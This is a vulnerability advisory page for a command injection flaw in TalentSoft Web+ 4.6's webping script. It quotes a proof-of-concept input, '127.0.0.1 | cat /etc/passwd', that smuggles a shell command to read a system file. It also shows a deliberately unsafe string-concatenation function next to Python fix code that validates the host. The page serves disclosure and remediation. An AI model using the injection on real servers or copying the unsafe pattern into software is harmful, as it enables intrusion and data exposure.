Talentsoft Web+ Example Script File Disclosure Vulnerability
BID:1725
Info
| Bugtraq ID: | 1725 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Sep 26 2000 12:00AM |
| Updated: | Sep 26 2000 12:00AM |
| Credit: | This vulnerability was reported to bugtraq by Delphis Consulting Internet Security Team (DCIST) in an advisory (DST2K0042) dated 26/09/2000. |
| Vulnerable: | TalentSoft Web+ Application Server (Linux) 4.6 |
| Not Vulnerable: | |
Exploit / POC
Excerpted from the Delphis Consulting Internet Security Team (DCIST) advisory (DST2K0042):
To exploit simply place a '|' after the parameter you wish to provide to
ping and then the command you wish to execute.
e.g.:
Go to:
http://target/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
Then type in host destination box:
127.0.0.1 | cat /etc/passwd
You will then be presented with the contents of the /etc/passwd file.
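The fix for this class of bug, shown as an added example that is not part of the advisory or of Web+ itself: the host value is checked against IP-address and hostname syntax and then handed to ping as a single argv element, so no shell ever parses it. The source of webping.wml is not on this page; `unsafe_command` is an assumed reconstruction of the string-concatenation pattern the advisory's behaviour implies, and all function names are hypothetical.

```python
import ipaddress
import re
import subprocess

# One hostname label: letters, digits, hyphen; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def unsafe_command(host):
    # Assumed vulnerable pattern: the form value is pasted into text that a
    # shell will parse, so '|' in the value starts a second command.
    return "ping -c 1 " + host


def validate_host(value):
    """Return value if it is a literal IP address or a hostname, else raise."""
    if not isinstance(value, str) or not value or len(value) > 253:
        raise ValueError("host must be a non-empty string of at most 253 chars")
    try:
        ipaddress.ip_address(value)
        return value
    except ValueError:
        pass  # not an IP literal; fall through to the hostname check
    labels = value.rstrip(".").split(".")
    # fullmatch rejects spaces, '|', ';', '$', quotes, newlines and any label
    # starting with '-' (which ping would otherwise read as an option).
    if all(_LABEL.fullmatch(label) for label in labels):
        return value
    raise ValueError("host is not an IP address or hostname")


def build_ping_argv(host, count=1):
    """Argument vector for ping; the host is exactly one element."""
    return ["ping", "-c", str(int(count)), validate_host(host)]


def run_ping(host):
    # A list with the default shell=False means no shell is involved at all.
    return subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=10)
```
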
References
- How to disable webrun (TalentSoft)
- TalentSoft Homepage (TalentSoft)